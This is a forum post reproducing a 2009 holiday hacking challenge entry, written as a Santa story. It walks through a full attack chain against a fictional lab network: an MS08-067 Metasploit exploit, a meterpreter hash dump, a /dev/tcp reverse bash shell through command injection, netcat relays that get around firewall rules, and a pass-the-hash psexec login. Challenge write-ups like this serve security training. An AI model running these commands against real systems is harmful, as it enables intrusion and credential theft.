Post Wed Jan 21, 2009 2:00 am

Skillz December 08 Winning Entry - Technical

Mark Baggett


Santa’s Macintosh had received an IP address of 192.168.1.110.  He fired up his virtual machines with bridged networking and ran a quick network scan to identify the hosts he saw on the network diagram using the following command.

#nmap –sV –n –PN 192.168.1.1/24

Several minutes later he had identified the following hosts on his network segment

192.168.1.10 Burgermeister’s Jailmaster Laptop 192.168.1.20 Web1 Webserver with command execution vulnerability 192.168.1.30 Door1 computer with dooropen.exe 192.168.1.110 Santa’s Macintosh
192.168.1.111 Santa’s Virtual Linux machine
192.168.1.112 Santa’s Virtual Windows Machine

Here is Santa’s plan.  He will use the existing login for the Burgermeister on his jailmasterlaptop to launch dooropen.exe on door1.  If you don't specify credentials psexec will logon to the remote host using the currently logged on user.  But Santa had a couple of obstacles to overcome first.  First he needs an interactive session with the Burgermeister's currently logged on account.  Then he needs to do some port hopping around firewall and iptables rules to hit the door1 with psexec. ?? VNC is a nice easy way to grab an interactive desktop and Metasploit is happy to provide.  So Santa typed the following line: ??

./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/bind_tcp RHOST=192.168.1.10 E

??In one swift command he had the interactive desktop with the jailmasterlaptop  From there he could easily could copy PSEXEC to der Burgermeister’s machine and use his existing credential to open the door.    Santa pressed ENTER on his metasploit attack and to his surprise found that the Burgermeister had logged off of his computer preventing him from  carrying out his attack.  The Wizard thought to himself, “If Santa had been paying attention earlier he would have known the Burgermeister had logged off”.    As Santa’s mind churned to come up with plan B he sat and watch the Burgermeister’s screensaver cycle through pictures of Burgermeister as a young man at 2600 meetings.    Then, like a stomachache after a night of binging on cookies and milk, it hit him.  He could pass the hash.  He broke his attack into 4 phases.

1) Acquire hashes for the jailmaster account from Burgermeister’s pc to use for a pass the hash attack on door1
2) Gain shell access to the Linux web server so we can use it as a relay to access door1
3) Setup Netcat Relays from Santa’s Virtual windows box through his own Linux virtual machine and the web server to door1
4) Pull it all together and launch the attack.  AKA: Use the stolen jailmaster hash, our netcat relays and psexec to run dooropen.exe

Step 1) Acquire Hashes from the Burgermeister’s PC

Santa closed his VNC window and changed his payload to the meterpreter so that he could get a copy of the Burgermeisters hash using its hashdump feature.  Santa changed his command to this:

./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.10 E??

and saw this..

[*] Meterpreter session 1 opened (192.168.1.111:58220 -> 192.168.1.10:4444)

meterpreter >

Santa typed “use priv”

meterpreter > use priv

and get this response

[-] The 'priv' extension has already been loaded.

Since Santa had a newer version of Metasploit and his exploit has administrative access meterpreter.rb automatically loaded the priv module for him  (http://trac.metasploit.com/changeset/5427)  So Santa typed:

meterpreter > hashdump

And saw this (among the other smattering of default accounts)

jailmaster:500:aad3b435b51404eeaad3b435b51404ee:5311fb075df1fe96efcbd51d6b9e0dcf:::

Santa could tell right away that Burgermeister had renamed his default administrator account to jailmaster because of the 500 RID in the hashdump results.  The Jolly old elf saved this information for later use.  Right now he needed shell on the webserver.

Step 2) Gain Shell on the webserver.

Santa used the remote code execution vulnerability on the web server to shovel a bash shell back to himself using /dev/tcp

First Santa setup a netcat listener on his Virtual Linux computer. 
nc –l –p 5500

Then he entered the following into the Address field of is firefox browser.

http://192.168.1.20?vulnerablepage.php? ... sh%20-i%20> /dev/tcp/192.168.1.111/5500%200<&1

Initially it appeared as though nothing happened.  This command doesn’t make the familiar bash prompt appear on the netcat listener, but it had in fact shoveled a bash prompt over /dev/tcp back to his virtual Linux host.  Since it uses an outbound connection, the iptables rules did not prevent the connection.  Now Santa had a shell on the Linux server and was ready to setup his netcat relays.

Step 3)  Setup some netcat relay magic to bypass the firewalls and get the computers domain name from door1

As  Kris looked at the network layout he gave a jolly chuckle.  The Burgermeister wasn’t using any egress filters on his Linux box.  This meant he could use the uber-cool Netcat “Gender Bender” relays he had recently learned about at SANS training.  Kris setup the following series of netcat relays:

On his Linux virtual machine (192.168.1.111) he typed the following command establishing a listener to listener netcat relay:

#mknod backpipe p
#nc –l –n –v -p 445 0<backpipe |  nc –l –v -n –p 54000 > backpipe

A simpler version would be
# nc –lp 445 0<backpipe | nc –lp 54000 > backpipe

but previous experience had shown him that the “OPEN” and “CONNECTION FROM” messages generated by netcats verbose output (-v) are very helpful when troubleshooting timing issues that arise when using complex netcat relays. 

On the shell he had previously shoveled over /dev/tcp from Linux webserver he prepared the following statements begin careful NOT to press enter on his netcat relay yet.

#mknod backpipe p
#nc –nv 192.168.1.30 445 0<backpipe | nc 192.168.1.111 54000 > backpipe

Because this uses two netcat clients which are tied together it will be unaffected by the iptables firewall running on the webserver.  The netcat client will connect outbound on port 54000 to the waiting listener on his Linux box.  At the same time it will connect to port 445 on door1.  Kris knows that he has to use the netcat connection to the SMB service on the door1 server within a second or two of establishing the connection.  So, he also prepared the following statement on his windows box at a command prompt.

C:\>Net use \\192.168.1.111\ipc$ /u:”” “”

This would connect to the netcat listener on his Linux box which is relayed through the netcat chains to the SMB listener on door1.

Then, working quickly to avoid a timeout, Kris pressed ENTER on his netcat client to client relay quickly followed by ENTER on his NET USE statement.  His NET USE statement returned “Command Completed Successfully.” Confirming the deed had been done and his relays worked.  Santa then typed

C:\>nbtstat –A 192.168.1.111

The nbtstat command traverses the relays to Door1 and returns something like this:

Name  Type  Status
DOOR1  <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered


Armed with his the domain name (WORKGROUP),  the jailmaster hash, psexec and a successful netcat relay,  Santa was ready to pull off the attack.

Santa tore down his netcat relay being sure to delete the existing SMB connection from his windows box that used the Null sessions.  When he hit control-c on his netcat relay it tore down both his relay and his shell so he had to set everything back up.  First Santa deleted his Null Session:

C:\>Net use \\192.168.1.111\ipc$ /delete

Then he set up his client to client relay exactly as he had before.  First shoveling his shell over /dev/tcp, then setting up the exact same client to client relay being careful not to press enter yet.  This time he would use the relay to connect with the jailmaster login.  He prepared the following statement on his Windows box

C:\>Net use \\192.168.1.111\c$

With both of those commands typed and ready to be launched Santa needed to load the jailmaster hashes into memory to pull off his attack.

Step 4)  Pulling it all together

Santa asked the wizard to download a copy of the Pass the Hash toolkit from Core Impact and provided him with this url: 

http://oss.coresecurity.com/projects/pshtoolkit.htm

The Windows binaries are only 179k and the wizard will have no trouble downloading it.

He put the pass the hash toolkit on his windows virtual machine and uses IAM-ALT.EXE to load the jailmaster hash into his computers memory.  (IAM-ALT.EXE provides support for a wider range of operating systems and seems to be more reliable than IAM.EXE)

To load and use the credentials Kris needed to provide IAM-ALT.EXE with four pieces of data.  He needs a username, a domain, an LM hash and an NTLM hash.  He can use the username and hashes he got from the Burgermeister’s laptop using meterpreter’s hashdump.    He will use the domain name he acquired earlier with nbtstat.  Kris loaded his hashed password into his computers memory by typing the following on his virtual windows computer.

C:\>IAM-ALT.EXE –h jailmaster workgroup aad3b435b51404eeaad3b435b51404ee 5311fb075df1fe96efcbd51d6b9e0dcf

This loaded the jailmaster hash into the memory of LSASRV.DLL for his windows workstation to use.    Windows will pass those credential over the series of netcat relays as follows:

Santa’s Windows computer with the jailmaster hash  ?  Santas Linux box netcat listener on 445  ? Santas Linux box netcat listener on 54000  ->  Netcat client on Webserver1 port 54000 -> Netcat Client on Webserver1 on port 445 -> SMB Server Service running on Door1

(Note that arrows represent the flow of the credentials once the TCP connections are established, not the direction in which the connections were established.)

Santa pressed enter on his Netcat relay on webserver1 followed quickly by enter on his NET USE statement and saw:

Command Completed Successfully.

He then typed the following command on his windows box

C:\>psexec \\192.168.1.111  dooropen.exe

The door opened.

Free from their bondage, Santa, Jessica and the wizard went straight to work.  They installed all of the patches on the Burgermeister's laptop being careful not to overlook third party applications like Adobe reader, flash and Apple Quicktime.  They installed Apache ModSecurity on web1 and configure a filter to prevent the command execution attack.  Then they hardened its iptables rules restricting outbound connection to only stateful responses.  He also setup an OSSEC on the Linux server to notify the Burgermeister via email when anyone made file system changes or attacked his webserver.  Then Santa, being Santa, reconfigured the Burgermeister's computer so that it would dual boot between Windows and Linux.  To make it easy for the Burgermeister Santa installed Backtrack3 on his other partition.  Just as he finished the Burgermeister barged through the door screaming GUARDS ARREST THEM!  When he got to his computer and saw want Santa had done, he began to cry.  Burgermeister shared the story of how in the 90's he had tried his hand at wireless hacking.  But he was a windows guy and recompiling the Linux kernel to add drivers that supported his Oronoco wireless card was just too much for him.  Intimidated by those who understand things he could not, der Burgermeister decided to eliminate all hacking tools.  Now, Santa, remote-exploit.org and Atheros had done the heavily lifting for him.  As the Burgermeister ran Karmetasploit for the very first time his heart warmed.  Santa explained that good security is about practicing defense in depth.  He explained that only by patching his machine,  hardening them and constantly monitoring would he ever achieve good security.  If the Burgermeister had been monitoring for file system changes or hacking attempts he would have easily detected his hacking attempts.  The Burgermeister thought to himself, "202c is a stupid law!!"  It was immediately repealed and now Defcon is held every year Sombertown.



Congrats,
Don
CISSP, MCSE, CSTA, Security+ SME